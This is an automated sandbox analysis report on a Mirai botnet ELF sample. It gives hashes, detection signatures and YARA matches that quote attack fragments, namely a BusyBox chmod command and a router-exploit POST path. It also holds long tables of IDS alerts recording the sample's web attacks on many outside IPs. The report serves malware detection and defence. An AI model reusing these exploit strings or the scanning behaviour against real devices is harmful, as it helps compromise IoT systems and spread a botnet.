Create Interactive Tour

Linux Analysis Report
z0r0.spc.elf

Overview

General Information

Sample name:z0r0.spc.elf
Analysis ID:1606670
MD5:c5ee1e4b1e2c0eeeee0a613084079ee3
SHA1:a5d90827592166a27f52d632308a8df86468e36a
SHA256:9c6773a6fcb0568b462363c5c3ac043554b9e3e7439ad771954fc4c3be263650
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:100
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Sample tries to kill multiple processes (SIGKILL)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1606670
Start date and time:2025-02-04 18:10:10 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 4s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:z0r0.spc.elf
Detection:MAL
Classification:mal100.spre.troj.linELF@0/0@5/0
  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: raw.igxhost.ru
Command:/tmp/z0r0.spc.elf
PID:5821
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
unstable_is_the_history_of_universe
Standard Error:
  • system is lnxubuntu20
  • wrapper-2.0 (PID: 5836, Parent: 3235, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 5837, Parent: 3235, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 5838, Parent: 3235, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 5839, Parent: 3235, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 5840, Parent: 3235, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 5841, Parent: 3235, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
z0r0.spc.elfJoeSecurity_Mirai_5Yara detected MiraiJoe Security
    z0r0.spc.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      z0r0.spc.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        z0r0.spc.elfMAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
        • 0x10c3a:$x2: /bin/busybox chmod 777 * /tmp/
        • 0x10990:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
        • 0x108d8:$s3: POST /cdn-cgi/
        z0r0.spc.elfMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
        • 0x108d8:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
        SourceRuleDescriptionAuthorStrings
        5825.1.00007fad3c011000.00007fad3c023000.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
          5825.1.00007fad3c011000.00007fad3c023000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
            5825.1.00007fad3c011000.00007fad3c023000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              5825.1.00007fad3c011000.00007fad3c023000.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
              • 0x10c3a:$x2: /bin/busybox chmod 777 * /tmp/
              • 0x10990:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
              • 0x108d8:$s3: POST /cdn-cgi/
              5825.1.00007fad3c011000.00007fad3c023000.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
              • 0x108d8:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
              Click to see the 5 entries
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-04T18:11:17.904083+010020300921Web Application Attack192.168.2.155637666.135.17.8780TCP
              2025-02-04T18:11:18.206262+010020300921Web Application Attack192.168.2.1556618163.191.21.18380TCP
              2025-02-04T18:11:19.378631+010020300921Web Application Attack192.168.2.1552314150.158.10.5180TCP
              2025-02-04T18:11:20.211398+010020300921Web Application Attack192.168.2.1536874152.23.93.4580TCP
              2025-02-04T18:11:24.472665+010020300921Web Application Attack192.168.2.1560888195.210.137.3080TCP
              2025-02-04T18:11:25.286765+010020300921Web Application Attack192.168.2.1534476177.53.138.24980TCP
              2025-02-04T18:11:36.391381+010020300921Web Application Attack192.168.2.154124652.185.24.22880TCP
              2025-02-04T18:11:37.674865+010020300921Web Application Attack192.168.2.1555456177.82.8.4980TCP
              2025-02-04T18:11:37.739789+010020300921Web Application Attack192.168.2.154059480.99.95.15080TCP
              2025-02-04T18:11:37.751324+010020300921Web Application Attack192.168.2.154822695.13.149.11480TCP
              2025-02-04T18:11:37.784370+010020300921Web Application Attack192.168.2.1536720181.156.61.2080TCP
              2025-02-04T18:11:37.814924+010020300921Web Application Attack192.168.2.155549212.97.179.16280TCP
              2025-02-04T18:11:37.822196+010020300921Web Application Attack192.168.2.1547426173.206.97.19080TCP
              2025-02-04T18:11:37.870762+010020300921Web Application Attack192.168.2.1545246181.72.225.680TCP
              2025-02-04T18:11:38.006721+010020300921Web Application Attack192.168.2.155232884.59.111.13580TCP
              2025-02-04T18:11:38.054265+010020300921Web Application Attack192.168.2.153389275.202.255.13680TCP
              2025-02-04T18:11:38.065878+010020300921Web Application Attack192.168.2.1534258139.62.254.10780TCP
              2025-02-04T18:11:38.095110+010020300921Web Application Attack192.168.2.1549594115.185.195.25180TCP
              2025-02-04T18:11:38.143975+010020300921Web Application Attack192.168.2.1546086104.108.17.7180TCP
              2025-02-04T18:11:38.173206+010020300921Web Application Attack192.168.2.154845259.197.123.19180TCP
              2025-02-04T18:11:38.222179+010020300921Web Application Attack192.168.2.1556634148.124.95.17480TCP
              2025-02-04T18:11:38.241306+010020300921Web Application Attack192.168.2.1541596204.180.52.5580TCP
              2025-02-04T18:11:38.251144+010020300921Web Application Attack192.168.2.1553656116.7.76.2380TCP
              2025-02-04T18:11:38.258956+010020300921Web Application Attack192.168.2.1540282122.230.149.11480TCP
              2025-02-04T18:11:38.284637+010020300921Web Application Attack192.168.2.153827619.122.225.9180TCP
              2025-02-04T18:11:38.286219+010020300921Web Application Attack192.168.2.155882019.144.149.11380TCP
              2025-02-04T18:11:38.286621+010020300921Web Application Attack192.168.2.1537250171.125.195.17480TCP
              2025-02-04T18:11:38.690813+010020300921Web Application Attack192.168.2.1532782200.162.125.4980TCP
              2025-02-04T18:11:38.782754+010020300921Web Application Attack192.168.2.1558508106.129.170.23080TCP
              2025-02-04T18:11:38.878445+010020300921Web Application Attack192.168.2.1544592178.15.78.9780TCP
              2025-02-04T18:11:38.895338+010020300921Web Application Attack192.168.2.1533174148.218.47.16280TCP
              2025-02-04T18:11:38.913143+010020300921Web Application Attack192.168.2.1553500126.88.175.21580TCP
              2025-02-04T18:11:38.925400+010020300921Web Application Attack192.168.2.1538698206.18.177.1280TCP
              2025-02-04T18:11:38.985638+010020300921Web Application Attack192.168.2.155396682.32.93.11080TCP
              2025-02-04T18:11:38.991513+010020300921Web Application Attack192.168.2.154778641.137.229.24780TCP
              2025-02-04T18:11:39.069370+010020300921Web Application Attack192.168.2.153394813.108.32.21180TCP
              2025-02-04T18:11:39.081088+010020300921Web Application Attack192.168.2.153783435.149.142.16380TCP
              2025-02-04T18:11:39.126248+010020300921Web Application Attack192.168.2.1543492203.195.122.9880TCP
              2025-02-04T18:11:39.220090+010020300921Web Application Attack192.168.2.153720267.218.78.19180TCP
              2025-02-04T18:11:39.220126+010020300921Web Application Attack192.168.2.1556388166.138.238.3580TCP
              2025-02-04T18:11:39.235690+010020300921Web Application Attack192.168.2.1543514107.223.216.24080TCP
              2025-02-04T18:11:39.241495+010020300921Web Application Attack192.168.2.1549602216.213.46.23180TCP
              2025-02-04T18:11:39.287567+010020300921Web Application Attack192.168.2.1540134150.170.24.9080TCP
              2025-02-04T18:11:39.288898+010020300921Web Application Attack192.168.2.1541766124.184.212.22780TCP
              2025-02-04T18:11:39.798420+010020300921Web Application Attack192.168.2.155796651.139.218.3680TCP
              2025-02-04T18:11:39.800330+010020300921Web Application Attack192.168.2.154199225.233.224.3880TCP
              2025-02-04T18:11:39.822459+010020300921Web Application Attack192.168.2.1546296139.225.240.17280TCP
              2025-02-04T18:11:39.823341+010020300921Web Application Attack192.168.2.154239298.228.221.17680TCP
              2025-02-04T18:11:39.869788+010020300921Web Application Attack192.168.2.154999862.3.220.6680TCP
              2025-02-04T18:11:39.870198+010020300921Web Application Attack192.168.2.1545680176.100.12.17680TCP
              2025-02-04T18:11:39.871007+010020300921Web Application Attack192.168.2.155830895.141.34.8680TCP
              2025-02-04T18:11:40.535891+010020300921Web Application Attack192.168.2.1552372186.209.63.20080TCP
              2025-02-04T18:11:40.737541+010020300921Web Application Attack192.168.2.154854619.119.179.10780TCP
              2025-02-04T18:11:40.741244+010020300921Web Application Attack192.168.2.154955632.109.104.680TCP
              2025-02-04T18:11:40.782556+010020300921Web Application Attack192.168.2.15337649.119.226.18580TCP
              2025-02-04T18:11:40.813951+010020300921Web Application Attack192.168.2.1547682222.146.115.15380TCP
              2025-02-04T18:11:40.813985+010020300921Web Application Attack192.168.2.1543710155.48.55.4180TCP
              2025-02-04T18:11:40.815963+010020300921Web Application Attack192.168.2.1558146161.215.111.3780TCP
              2025-02-04T18:11:40.819661+010020300921Web Application Attack192.168.2.1543058125.144.55.23680TCP
              2025-02-04T18:11:40.869899+010020300921Web Application Attack192.168.2.1559318162.28.10.14880TCP
              2025-02-04T18:11:40.870111+010020300921Web Application Attack192.168.2.154979274.137.199.23180TCP
              2025-02-04T18:11:40.909562+010020300921Web Application Attack192.168.2.1547526204.176.132.11080TCP
              2025-02-04T18:11:40.956193+010020300921Web Application Attack192.168.2.153724884.0.101.24480TCP
              2025-02-04T18:11:41.038420+010020300921Web Application Attack192.168.2.1533010207.26.197.3680TCP
              2025-02-04T18:11:41.054205+010020300921Web Application Attack192.168.2.1536766143.23.249.3880TCP
              2025-02-04T18:11:41.096874+010020300921Web Application Attack192.168.2.154502232.71.11.10180TCP
              2025-02-04T18:11:41.128485+010020300921Web Application Attack192.168.2.155089842.77.12.9580TCP
              2025-02-04T18:11:41.161397+010020300921Web Application Attack192.168.2.155362617.53.64.20780TCP
              2025-02-04T18:11:41.241387+010020300921Web Application Attack192.168.2.155346435.94.114.16180TCP
              2025-02-04T18:11:41.241658+010020300921Web Application Attack192.168.2.154206479.68.93.2380TCP
              2025-02-04T18:11:41.266869+010020300921Web Application Attack192.168.2.1541752180.247.222.11980TCP
              2025-02-04T18:11:41.272562+010020300921Web Application Attack192.168.2.1556602126.182.35.20580TCP
              2025-02-04T18:11:41.298784+010020300921Web Application Attack192.168.2.156008640.54.178.14180TCP
              2025-02-04T18:11:41.304523+010020300921Web Application Attack192.168.2.1546724206.199.245.3680TCP
              2025-02-04T18:11:41.331767+010020300921Web Application Attack192.168.2.153651493.55.208.18480TCP
              2025-02-04T18:11:41.814107+010020300921Web Application Attack192.168.2.1539428183.119.84.21480TCP
              2025-02-04T18:11:41.814109+010020300921Web Application Attack192.168.2.154019225.68.126.5080TCP
              2025-02-04T18:11:41.831245+010020300921Web Application Attack192.168.2.155944054.197.207.1380TCP
              2025-02-04T18:11:41.831388+010020300921Web Application Attack192.168.2.1540176144.229.87.24280TCP
              2025-02-04T18:11:41.869999+010020300921Web Application Attack192.168.2.153401240.144.172.480TCP
              2025-02-04T18:11:41.870000+010020300921Web Application Attack192.168.2.154562042.210.68.20780TCP
              2025-02-04T18:11:41.870769+010020300921Web Application Attack192.168.2.1558574204.137.209.7580TCP
              2025-02-04T18:11:42.807366+010020300921Web Application Attack192.168.2.1555376151.3.92.18780TCP
              2025-02-04T18:11:42.816530+010020300921Web Application Attack192.168.2.1533914130.194.192.13180TCP
              2025-02-04T18:11:42.831571+010020300921Web Application Attack192.168.2.1538374166.170.65.20480TCP
              2025-02-04T18:11:42.871695+010020300921Web Application Attack192.168.2.1550488200.200.243.5680TCP
              2025-02-04T18:11:42.871750+010020300921Web Application Attack192.168.2.1533266191.252.64.22180TCP
              2025-02-04T18:11:42.871925+010020300921Web Application Attack192.168.2.1556554145.56.156.19580TCP
              2025-02-04T18:11:42.872282+010020300921Web Application Attack192.168.2.1546742187.194.10.19680TCP
              2025-02-04T18:11:42.872397+010020300921Web Application Attack192.168.2.153321827.157.203.19680TCP
              2025-02-04T18:11:42.872723+010020300921Web Application Attack192.168.2.154399223.137.87.16780TCP
              2025-02-04T18:11:42.873953+010020300921Web Application Attack192.168.2.1550216180.142.123.2780TCP
              2025-02-04T18:11:42.892068+010020300921Web Application Attack192.168.2.1547328117.127.29.4480TCP
              2025-02-04T18:11:42.894055+010020300921Web Application Attack192.168.2.155437258.27.47.22280TCP
              2025-02-04T18:11:42.898202+010020300921Web Application Attack192.168.2.155089813.138.57.21480TCP
              2025-02-04T18:11:42.914695+010020300921Web Application Attack192.168.2.154224090.177.70.1080TCP
              2025-02-04T18:11:43.053941+010020300921Web Application Attack192.168.2.1551524186.177.39.20080TCP
              2025-02-04T18:11:43.143875+010020300921Web Application Attack192.168.2.1544120179.210.59.21180TCP
              2025-02-04T18:11:43.195580+010020300921Web Application Attack192.168.2.1547236194.139.104.20380TCP
              2025-02-04T18:11:43.301991+010020300921Web Application Attack192.168.2.1558230219.172.14.2980TCP
              2025-02-04T18:11:43.313904+010020300921Web Application Attack192.168.2.1549030166.123.231.17980TCP
              2025-02-04T18:11:43.415622+010020300921Web Application Attack192.168.2.154806617.196.195.9580TCP
              2025-02-04T18:11:43.442774+010020300921Web Application Attack192.168.2.1547862126.24.223.9880TCP
              2025-02-04T18:11:43.458803+010020300921Web Application Attack192.168.2.1543838220.194.72.14680TCP
              2025-02-04T18:11:43.538505+010020300921Web Application Attack192.168.2.1556918199.63.47.20980TCP
              2025-02-04T18:11:43.552474+010020300921Web Application Attack192.168.2.15383482.113.145.2680TCP
              2025-02-04T18:11:43.565862+010020300921Web Application Attack192.168.2.154616866.85.21.13980TCP
              2025-02-04T18:11:43.646587+010020300921Web Application Attack192.168.2.1538874193.2.130.24580TCP
              2025-02-04T18:11:43.689135+010020300921Web Application Attack192.168.2.154943270.252.93.5980TCP
              2025-02-04T18:11:43.720254+010020300921Web Application Attack192.168.2.154319674.202.42.980TCP
              2025-02-04T18:11:43.806078+010020300921Web Application Attack192.168.2.154885476.137.1.18080TCP
              2025-02-04T18:11:43.829513+010020300921Web Application Attack192.168.2.153659683.133.89.18280TCP
              2025-02-04T18:11:43.867323+010020300921Web Application Attack192.168.2.15543868.144.12.8880TCP
              2025-02-04T18:11:43.867370+010020300921Web Application Attack192.168.2.15444229.135.213.1680TCP
              2025-02-04T18:11:43.867556+010020300921Web Application Attack192.168.2.1556248220.183.243.17280TCP
              2025-02-04T18:11:43.868604+010020300921Web Application Attack192.168.2.154954439.92.130.20680TCP
              2025-02-04T18:11:43.868635+010020300921Web Application Attack192.168.2.153712431.174.97.13580TCP
              2025-02-04T18:11:43.868693+010020300921Web Application Attack192.168.2.155822260.220.250.24980TCP
              2025-02-04T18:11:43.868926+010020300921Web Application Attack192.168.2.153928084.153.123.23580TCP
              2025-02-04T18:11:43.869677+010020300921Web Application Attack192.168.2.1549952160.19.223.2580TCP
              2025-02-04T18:11:43.869785+010020300921Web Application Attack192.168.2.1538648137.251.33.15480TCP
              2025-02-04T18:11:43.869864+010020300921Web Application Attack192.168.2.1554582211.243.248.19280TCP
              2025-02-04T18:11:43.869866+010020300921Web Application Attack192.168.2.1545518139.241.185.9680TCP
              2025-02-04T18:11:43.869894+010020300921Web Application Attack192.168.2.1552556174.26.69.18780TCP
              2025-02-04T18:11:43.869951+010020300921Web Application Attack192.168.2.1535476171.186.242.2280TCP
              2025-02-04T18:11:43.869968+010020300921Web Application Attack192.168.2.1535974128.120.255.480TCP
              2025-02-04T18:11:43.870098+010020300921Web Application Attack192.168.2.154116254.251.33.1880TCP
              2025-02-04T18:11:43.870103+010020300921Web Application Attack192.168.2.1549432141.20.42.23880TCP
              2025-02-04T18:11:43.870148+010020300921Web Application Attack192.168.2.153561097.197.78.24180TCP
              2025-02-04T18:11:43.870212+010020300921Web Application Attack192.168.2.1545780126.176.228.19780TCP
              2025-02-04T18:11:43.876728+010020300921Web Application Attack192.168.2.153642250.52.226.19580TCP
              2025-02-04T18:11:43.877396+010020300921Web Application Attack192.168.2.154379423.15.127.18380TCP
              2025-02-04T18:11:43.878866+010020300921Web Application Attack192.168.2.1553316187.217.155.17580TCP
              2025-02-04T18:11:43.884516+010020300921Web Application Attack192.168.2.1542838161.104.195.7880TCP
              2025-02-04T18:11:43.894216+010020300921Web Application Attack192.168.2.155641890.198.87.16880TCP
              2025-02-04T18:11:43.895815+010020300921Web Application Attack192.168.2.154170483.238.144.6180TCP
              2025-02-04T18:11:43.907637+010020300921Web Application Attack192.168.2.154831886.35.202.6980TCP
              2025-02-04T18:11:43.913606+010020300921Web Application Attack192.168.2.153784663.54.131.2080TCP
              2025-02-04T18:11:43.913830+010020300921Web Application Attack192.168.2.153838257.0.217.8480TCP
              2025-02-04T18:11:43.913899+010020300921Web Application Attack192.168.2.1550544113.9.76.5580TCP
              2025-02-04T18:11:43.914016+010020300921Web Application Attack192.168.2.15333869.120.59.10080TCP
              2025-02-04T18:11:43.915770+010020300921Web Application Attack192.168.2.156069625.119.53.580TCP
              2025-02-04T18:11:43.942810+010020300921Web Application Attack192.168.2.154771841.39.69.13980TCP
              2025-02-04T18:11:43.974132+010020300921Web Application Attack192.168.2.1535178179.192.200.23180TCP
              2025-02-04T18:11:44.007263+010020300921Web Application Attack192.168.2.1537570158.116.133.14480TCP
              2025-02-04T18:11:44.065988+010020300921Web Application Attack192.168.2.153821674.93.106.20380TCP
              2025-02-04T18:11:44.085603+010020300921Web Application Attack192.168.2.1557624190.1.187.2380TCP
              2025-02-04T18:11:44.085931+010020300921Web Application Attack192.168.2.155874670.27.202.24980TCP
              2025-02-04T18:11:44.099347+010020300921Web Application Attack192.168.2.1552356113.60.71.880TCP
              2025-02-04T18:11:45.145876+010020300921Web Application Attack192.168.2.155939037.111.84.5480TCP
              2025-02-04T18:11:45.148672+010020300921Web Application Attack192.168.2.155198654.130.141.17080TCP
              2025-02-04T18:11:46.142273+010020300921Web Application Attack192.168.2.1555838202.190.152.11580TCP
              2025-02-04T18:11:46.159988+010020300921Web Application Attack192.168.2.1537292194.10.184.12480TCP
              2025-02-04T18:11:46.592325+010020300921Web Application Attack192.168.2.153396418.238.109.20580TCP
              2025-02-04T18:11:47.017846+010020300921Web Application Attack192.168.2.1547016161.225.186.18980TCP
              2025-02-04T18:11:47.142085+010020300921Web Application Attack192.168.2.154645224.76.98.280TCP
              2025-02-04T18:11:47.143736+010020300921Web Application Attack192.168.2.1556378193.158.34.3480TCP
              2025-02-04T18:11:47.147602+010020300921Web Application Attack192.168.2.1542332197.171.131.23080TCP
              2025-02-04T18:11:47.148189+010020300921Web Application Attack192.168.2.15606981.19.246.23580TCP
              2025-02-04T18:11:47.173412+010020300921Web Application Attack192.168.2.155693883.248.130.2380TCP
              2025-02-04T18:11:49.237715+010020300921Web Application Attack192.168.2.1536338121.240.223.25380TCP
              2025-02-04T18:11:49.239566+010020300921Web Application Attack192.168.2.15509621.198.0.18380TCP
              2025-02-04T18:11:49.257908+010020300921Web Application Attack192.168.2.1554824149.23.206.24480TCP
              2025-02-04T18:11:49.259114+010020300921Web Application Attack192.168.2.15383385.194.208.13380TCP
              2025-02-04T18:11:49.290571+010020300921Web Application Attack192.168.2.153580644.91.54.1380TCP
              2025-02-04T18:11:50.239651+010020300921Web Application Attack192.168.2.153503632.158.13.25280TCP
              2025-02-04T18:11:51.290778+010020300921Web Application Attack192.168.2.154777276.93.228.10380TCP
              2025-02-04T18:11:52.236751+010020300921Web Application Attack192.168.2.1537698143.146.138.16880TCP
              2025-02-04T18:11:52.236752+010020300921Web Application Attack192.168.2.1546400187.17.238.10080TCP
              2025-02-04T18:11:52.238257+010020300921Web Application Attack192.168.2.156037042.15.218.9780TCP
              2025-02-04T18:11:52.240099+010020300921Web Application Attack192.168.2.1537954152.212.91.5980TCP
              2025-02-04T18:11:52.274944+010020300921Web Application Attack192.168.2.1560098116.188.200.17380TCP
              2025-02-04T18:11:52.288547+010020300921Web Application Attack192.168.2.153803420.106.247.17380TCP
              2025-02-04T18:11:53.251913+010020300921Web Application Attack192.168.2.155660840.206.98.12080TCP
              2025-02-04T18:11:53.269463+010020300921Web Application Attack192.168.2.1548844163.146.97.22180TCP
              2025-02-04T18:11:53.269492+010020300921Web Application Attack192.168.2.1545230105.218.189.22280TCP
              2025-02-04T18:11:53.273571+010020300921Web Application Attack192.168.2.154932672.125.5.12480TCP
              2025-02-04T18:11:53.276671+010020300921Web Application Attack192.168.2.155610451.155.163.2180TCP
              2025-02-04T18:11:53.288703+010020300921Web Application Attack192.168.2.1552884201.191.230.9580TCP
              2025-02-04T18:11:54.283086+010020300921Web Application Attack192.168.2.153456886.223.23.11280TCP
              2025-02-04T18:11:54.283592+010020300921Web Application Attack192.168.2.153735664.172.203.18880TCP
              2025-02-04T18:11:54.302322+010020300921Web Application Attack192.168.2.154548431.162.52.080TCP
              2025-02-04T18:11:54.304384+010020300921Web Application Attack192.168.2.1552140216.199.168.7380TCP
              2025-02-04T18:11:54.321789+010020300921Web Application Attack192.168.2.1552674108.16.63.23380TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-04T18:11:17.904083+010020290341Web Application Attack192.168.2.155637666.135.17.8780TCP
              2025-02-04T18:11:18.206262+010020290341Web Application Attack192.168.2.1556618163.191.21.18380TCP
              2025-02-04T18:11:19.378631+010020290341Web Application Attack192.168.2.1552314150.158.10.5180TCP
              2025-02-04T18:11:20.211398+010020290341Web Application Attack192.168.2.1536874152.23.93.4580TCP
              2025-02-04T18:11:24.472665+010020290341Web Application Attack192.168.2.1560888195.210.137.3080TCP
              2025-02-04T18:11:25.286765+010020290341Web Application Attack192.168.2.1534476177.53.138.24980TCP
              2025-02-04T18:11:36.391381+010020290341Web Application Attack192.168.2.154124652.185.24.22880TCP
              2025-02-04T18:11:37.674865+010020290341Web Application Attack192.168.2.1555456177.82.8.4980TCP
              2025-02-04T18:11:37.739789+010020290341Web Application Attack192.168.2.154059480.99.95.15080TCP
              2025-02-04T18:11:37.751324+010020290341Web Application Attack192.168.2.154822695.13.149.11480TCP
              2025-02-04T18:11:37.784370+010020290341Web Application Attack192.168.2.1536720181.156.61.2080TCP
              2025-02-04T18:11:37.814924+010020290341Web Application Attack192.168.2.155549212.97.179.16280TCP
              2025-02-04T18:11:37.822196+010020290341Web Application Attack192.168.2.1547426173.206.97.19080TCP
              2025-02-04T18:11:37.870762+010020290341Web Application Attack192.168.2.1545246181.72.225.680TCP
              2025-02-04T18:11:38.006721+010020290341Web Application Attack192.168.2.155232884.59.111.13580TCP
              2025-02-04T18:11:38.054265+010020290341Web Application Attack192.168.2.153389275.202.255.13680TCP
              2025-02-04T18:11:38.065878+010020290341Web Application Attack192.168.2.1534258139.62.254.10780TCP
              2025-02-04T18:11:38.095110+010020290341Web Application Attack192.168.2.1549594115.185.195.25180TCP
              2025-02-04T18:11:38.143975+010020290341Web Application Attack192.168.2.1546086104.108.17.7180TCP
              2025-02-04T18:11:38.173206+010020290341Web Application Attack192.168.2.154845259.197.123.19180TCP
              2025-02-04T18:11:38.222179+010020290341Web Application Attack192.168.2.1556634148.124.95.17480TCP
              2025-02-04T18:11:38.241306+010020290341Web Application Attack192.168.2.1541596204.180.52.5580TCP
              2025-02-04T18:11:38.251144+010020290341Web Application Attack192.168.2.1553656116.7.76.2380TCP
              2025-02-04T18:11:38.258956+010020290341Web Application Attack192.168.2.1540282122.230.149.11480TCP
              2025-02-04T18:11:38.284637+010020290341Web Application Attack192.168.2.153827619.122.225.9180TCP
              2025-02-04T18:11:38.286219+010020290341Web Application Attack192.168.2.155882019.144.149.11380TCP
              2025-02-04T18:11:38.286621+010020290341Web Application Attack192.168.2.1537250171.125.195.17480TCP
              2025-02-04T18:11:38.690813+010020290341Web Application Attack192.168.2.1532782200.162.125.4980TCP
              2025-02-04T18:11:38.782754+010020290341Web Application Attack192.168.2.1558508106.129.170.23080TCP
              2025-02-04T18:11:38.878445+010020290341Web Application Attack192.168.2.1544592178.15.78.9780TCP
              2025-02-04T18:11:38.895338+010020290341Web Application Attack192.168.2.1533174148.218.47.16280TCP
              2025-02-04T18:11:38.913143+010020290341Web Application Attack192.168.2.1553500126.88.175.21580TCP
              2025-02-04T18:11:38.925400+010020290341Web Application Attack192.168.2.1538698206.18.177.1280TCP
              2025-02-04T18:11:38.985638+010020290341Web Application Attack192.168.2.155396682.32.93.11080TCP
              2025-02-04T18:11:38.991513+010020290341Web Application Attack192.168.2.154778641.137.229.24780TCP
              2025-02-04T18:11:39.069370+010020290341Web Application Attack192.168.2.153394813.108.32.21180TCP
              2025-02-04T18:11:39.081088+010020290341Web Application Attack192.168.2.153783435.149.142.16380TCP
              2025-02-04T18:11:39.126248+010020290341Web Application Attack192.168.2.1543492203.195.122.9880TCP
              2025-02-04T18:11:39.220090+010020290341Web Application Attack192.168.2.153720267.218.78.19180TCP
              2025-02-04T18:11:39.220126+010020290341Web Application Attack192.168.2.1556388166.138.238.3580TCP
              2025-02-04T18:11:39.235690+010020290341Web Application Attack192.168.2.1543514107.223.216.24080TCP
              2025-02-04T18:11:39.241495+010020290341Web Application Attack192.168.2.1549602216.213.46.23180TCP
              2025-02-04T18:11:39.287567+010020290341Web Application Attack192.168.2.1540134150.170.24.9080TCP
              2025-02-04T18:11:39.288898+010020290341Web Application Attack192.168.2.1541766124.184.212.22780TCP
              2025-02-04T18:11:39.798420+010020290341Web Application Attack192.168.2.155796651.139.218.3680TCP
              2025-02-04T18:11:39.800330+010020290341Web Application Attack192.168.2.154199225.233.224.3880TCP
              2025-02-04T18:11:39.822459+010020290341Web Application Attack192.168.2.1546296139.225.240.17280TCP
              2025-02-04T18:11:39.823341+010020290341Web Application Attack192.168.2.154239298.228.221.17680TCP
              2025-02-04T18:11:39.869788+010020290341Web Application Attack192.168.2.154999862.3.220.6680TCP
              2025-02-04T18:11:39.870198+010020290341Web Application Attack192.168.2.1545680176.100.12.17680TCP
              2025-02-04T18:11:39.871007+010020290341Web Application Attack192.168.2.155830895.141.34.8680TCP
              2025-02-04T18:11:40.535891+010020290341Web Application Attack192.168.2.1552372186.209.63.20080TCP
              2025-02-04T18:11:40.737541+010020290341Web Application Attack192.168.2.154854619.119.179.10780TCP
              2025-02-04T18:11:40.741244+010020290341Web Application Attack192.168.2.154955632.109.104.680TCP
